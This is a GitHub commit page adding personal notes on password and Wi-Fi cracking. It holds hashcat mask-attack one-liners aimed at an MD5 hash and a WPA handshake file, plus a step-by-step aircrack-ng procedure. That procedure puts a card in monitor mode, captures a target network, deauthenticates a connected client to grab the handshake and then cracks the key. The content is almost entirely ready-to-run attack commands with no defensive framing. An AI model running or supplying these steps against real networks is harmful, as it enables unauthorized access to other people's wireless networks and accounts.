Skip to content

Commit ce56f96

Browse files
committed
Added lots of MITM, WiFi and Cracking literature
1 parent e5a6541 commit ce56f96

File tree

152 files changed

+12103
-0
lines changed

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

152 files changed

+12103
-0
lines changed
Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
./mp64.bin -1 ?l?u?d?s -i --increment-min=6 --increment-max=12 ?1?1?1?1?1?1?1?1?1?1?1?1 | ./oclHashcat-plus32.bin -m 0 -r rules/combinator.rule ff56e15165594cac8ad689471d579bd7
Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
./mp64.bin -i --increment-min=6 --increment-max=14 -1 ?l?u?d ?1?1?1?1?1?1?1?1?1?1?1?1?1 | ./oclHashcat-plus64.bin -m 2500 /home/p1xi3/Downloads/18360_1338934241.hccap
Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,9 @@
1+
1. Set wireless card in monitor mode:
2+
sudo airmon-ng start wlan0
3+
2. Listen in on all traffic around
4+
sudo airodump-ng mon0
5+
3. Pick an accesspoint (preferably with connected clients) & filter it
6+
sudo airodump-ng --channel N --bssid [bssid] -w /tmp/cap mon0
7+
4. As soon as you see a client, deauth him
8+
sudo aireplay-ng -0 10 -a [bssid] -c [client bssid] mon0
9+
5. Once enough has been captures, upload the cap file to Hashcat and crack the returned hccap file; or crack it with a wordlist.
Binary file not shown.

Crypto/Cracking Passwords/oclHashcat

Lines changed: 3 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,3 @@
1+
1. Start oclHashcat-gui64.bin
2+
2. Wordlists are found in WindowsDrive/Users/poni/Downloads/Wordlist/Super-WPA, or the oclHashcat+ wordlist folder.
3+
3. Rules are found in the rules folder.
Binary file not shown.

0 commit comments

Comments
 (0)